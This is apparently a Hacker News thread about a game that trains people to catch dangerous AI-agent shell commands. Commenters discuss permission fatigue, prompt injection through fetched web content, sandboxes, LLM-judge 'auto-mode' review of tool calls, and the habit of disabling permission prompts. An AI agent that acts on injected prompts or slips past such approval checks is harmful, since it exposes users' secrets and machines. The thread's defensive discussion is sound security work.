Love how it always want to send my packages to random domain. Has that happened anyone in practice?

by paddycorr

5/28/2026 at 7:53:38 PM

This is one of two reasons why I wrote yoloAI. I never get these permission prompts anymore. It feels a lot like after installing an adblocker.

by kstenerud

5/28/2026 at 3:22:08 PM

1,640 points on my first try—I fell into a few traps, but it was really interesting. Thanks for the little game! I'm sharing it with my coworkers :)

by cadwell

5/29/2026 at 6:40:38 AM

I got tired of the permission prompts and wrote a filesystem/network sandbox so I could skip all permission checks. It works on the same principle as bubblewrap, but has some niceties to separate Claude from its credentials. See https://github.com/hanwen/runclaude

by hanwenn

5/29/2026 at 6:49:21 AM

[dead]

by huflungdung

5/28/2026 at 4:45:24 PM

This current thread is proof of AI psychosis.

by rvz

5/28/2026 at 4:49:48 PM

What the hell is going on in this thread? This isn't good. The "threats" don't make sense. Oh no, all the sensitive information in my package.json...

by stuartjohnson12

5/28/2026 at 5:53:04 PM

Here's the threat model I (a luddite) use to evaluate these. The claude code harness can be mostly trusted, the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data/code in an llm [0][1].

I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.

Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.

This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?

[0]: https://www.schneier.com/essays/archives/2024/05/llms-data-c... [1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

by cobbal

5/28/2026 at 5:15:45 PM

If you think the worst that an agent can do is leak your package.json, your threat model is wayyy broken.

by kennywinker

5/28/2026 at 10:51:14 PM

This really hits the nail on the head. The current permissions models are totally broken IMO. You're either approving everything, restricting access and neutering your agent, or full YOLOing and, well, good luck. The right primitives are not in place yet, and there's no clearly correct answers.

I think the right primitive is "task-based authorization", where you review a high-level task and let an LLM judge decide whether the subsequent tool calls fall into the scope of that task. It's not perfect, but it distills dozens of approvals down to one and gives you risk-based signals of whether you should pay close attention or not.

by ericlevine

5/28/2026 at 3:31:30 PM

Continue? Y/N ── SCORE: 2,343 Security-Conscious Engineer

Caught 8/8 threats "Not a single secret leaked"

→ llmgame.scalex.dev

by sevenseacat

5/28/2026 at 6:26:55 PM

Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer

Caught 3/3 threats "Not a single secret leaked"

So are there 3 threats? 8? Is it a different game?

Does everyone get a "good" score even if they missed 5 threats?!

by neogodless

5/28/2026 at 7:24:21 PM

It's a game you play over one minute. They probably saw more prompts than you.

by t-writescode

5/28/2026 at 6:07:31 PM

Very fun. I can only imagine building this with Claude and testing needed a bit of mental concentration.

by martin-adams

5/28/2026 at 6:48:31 PM

"Auto" in Claude and "Auto-review" in Codex are the only way to do agentic coding.

by wilg

5/28/2026 at 8:56:33 PM

A bit too JavaScript specific... can't really play if you don't know that ecosystem.

by eqvinox

5/29/2026 at 12:41:13 PM

It suggests that "kill $(lsof -t -i:3000)" is completely safe, which it's not, if you don't know what runs on that port. Maybe some Javascript framework runs on that port, I don't know, but neither does the AI, the developer may have moved it, because something important runs on that port already.

by mrweasel

5/28/2026 at 6:43:36 PM

Pressed 1 for everything, no regrets

by graphememes

5/28/2026 at 4:14:25 PM

To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.

by bspammer

5/28/2026 at 3:25:12 PM

some of the sandboxing ive been playing with gives me the best of both yolo and like logic programming tier perms on llm actions in env. still not ready for prime time though ;)

by carterschonwald

5/28/2026 at 4:32:32 PM

You can turn that off with an option in most agents.

My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.

by ilaksh

5/28/2026 at 4:42:24 PM

How many car accidents have you been in, and do you wear your seatbelt when you're in a car?

by fragmede

5/28/2026 at 4:46:46 PM

> It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked

Until it does. A simple curl request to a compromised website could inject a malicious prompt into it.

by flux3125

5/28/2026 at 9:40:51 PM

that was soooo last month, “auto-mode” is the way now

another agent reviews every command and blocks destructive ones

by yieldcrv

5/29/2026 at 1:38:37 PM

these days I rely on auto mode. :) it's like trust-as-a-service

by cat-whisperer

5/29/2026 at 9:52:30 PM

Really cool!!

by magikMaker

5/29/2026 at 5:45:58 AM

This is cool. Could be used for training. But it's a bit too easy when it's a game where you are expecting dangerous commands. The real fatigue comes from accepting hundreds of obviously safe commands during a work day. Then it's easy start accepting everything without really reading it.

by hastily3114

5/28/2026 at 4:30:06 PM

Nice got 6/6

by Trung0246

5/28/2026 at 8:50:26 PM

Scope Violation: `cat ~/.zshrc`

Scope Violation: `ls ~/Documents`

Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!

by inetknght

5/28/2026 at 9:11:53 PM

claude --dangerously-skip-permissions

just give in

by rib3ye

5/28/2026 at 4:21:17 PM

Score is 6711 by just saying no to everything

by ramonga

5/31/2026 at 2:13:29 PM

[flagged]

by eddysir

5/28/2026 at 4:56:57 PM

[flagged]

by vgudur297

5/28/2026 at 7:01:33 PM

[flagged]

by KaiShips

5/29/2026 at 2:24:50 PM

[flagged]

by Andy_Donner

5/30/2026 at 3:53:14 PM

[flagged]

by willyv3

5/31/2026 at 1:24:16 AM

[dead]

by robert_nguyen

5/29/2026 at 7:22:02 AM

[flagged]

by unjuno

5/29/2026 at 2:18:22 PM

[flagged]

by takakaze

5/29/2026 at 9:19:18 AM

[flagged]

by Ozzie-D

5/30/2026 at 2:11:01 AM

[flagged]

by xuanlin314

5/29/2026 at 2:56:21 AM

[flagged]

by xuanlin314

5/29/2026 at 7:28:55 AM

[flagged]

by jkwang

5/28/2026 at 11:43:50 PM

[flagged]

by sid0707

5/28/2026 at 9:27:04 PM

[flagged]

by sekihan

5/29/2026 at 4:53:39 AM

[flagged]

by eddysir

5/28/2026 at 7:13:39 PM

[flagged]

by eidongrowth

5/28/2026 at 5:10:44 PM

[flagged]

by syedofc

5/28/2026 at 8:57:59 PM

[flagged]

by MadGodInc

5/28/2026 at 7:47:05 PM

[dead]

by willyv3

5/29/2026 at 12:53:35 PM

[flagged]

by s95124328

5/29/2026 at 11:32:08 AM

[flagged]

by crystacathol

5/29/2026 at 11:30:25 AM

[flagged]

by crystacathol

5/29/2026 at 7:49:39 AM

[flagged]

by shnayadhillo

5/29/2026 at 8:25:29 AM

[dead]

by leeeeep101

5/30/2026 at 9:53:51 PM

[dead]

by brittslimm

5/30/2026 at 9:53:16 PM

[dead]

by brittslimm